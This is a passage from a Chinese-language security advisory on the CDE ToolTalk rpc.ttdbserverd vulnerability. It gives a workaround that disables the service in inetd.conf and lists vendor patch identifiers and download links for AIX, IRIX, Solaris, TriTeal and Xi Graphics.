在该行的开始处增加"#"号来将其注释:
#100083/1 tli rpc/tcp wait root /usr/dt/bin/rpc.ttdbserverd rpc.ttdbserverd
存盘退出。然后重启inetd:
# ps -ef|grep inetd
# kill -HUP <inetd的pid>
厂商补丁:
IBM
---
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.ers.ibm.com/
IBM AIX 4.1:
IBM APAR IX81440
IBM AIX 4.1.1:
IBM APAR IX81440
IBM AIX 4.1.2:
IBM APAR IX81440
IBM AIX 4.1.3:
IBM APAR IX81440
IBM AIX 4.1.4:
IBM APAR IX81440
IBM AIX 4.1.5:
IBM APAR IX81440
IBM AIX 4.2:
IBM APAR IX81441
IBM AIX 4.2.1:
IBM APAR IX81441
IBM AIX 4.3:
IBM APAR IX81442
SGI
---
SGI已经为此发布了两个安全公告(19981101-01-P,20020302-01-A)以及相应补丁:
19981101-01-P:Vulnerability in ToolTalk RPC Service
链接:ftp://patches.sgi.com/support/free/security/advisories/19981101-01-P
20020302-01-A:Additional CDE and CDE ToolTalk Vulnerabilities
链接:ftp://patches.sgi.com/support/free/security/advisories/20020302-01-A
Sun
---
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://sunsolve.sun.com/sunsolve/pubpatches/patches.html
Sun Solaris 1.1:
Sun Solaris 1.1.1:
Sun Solaris 1.1.2:
Sun Solaris 1.1.3 _U1:
Sun Solaris 1.1.3:
Sun Solaris 1.1.4 -JL:
Sun Solaris 1.1.4:
Sun Solaris 1.2:
Sun Solaris 2.0:
Sun Solaris 2.1:
Sun Solaris 2.2:
Sun Solaris 2.3:
Sun Patch 101495-03
Sun Solaris 2.4 _x86:
Sun Patch 108641-01
Sun Solaris 2.4:
Sun Patch 102734-05
Sun Solaris 2.5 _x86:
Sun Solaris 2.5:
Sun Solaris 2.5.1 _x86:
Sun Solaris 2.5.1 _ppc:
Sun Solaris 2.5.1:
Sun Solaris 2.6 _x86:
Sun Patch 105803-05
Sun Solaris 2.6:
Sun Patch 105802-05
TriTeal
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.triteal.com/support
TriTeal TED CDE 4.4
Xi Graphics
-----------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
ftp://ftp.xig.com:/pub/updates/cde/1.2.3/C1203.002.tar.gz
ftp://ftp.xig.com:/pub/updates/cde/1.2.3/C1203.002.txt
浏览次数:4549
严重程度:0(网友投票)
绿盟科技给您安全的保障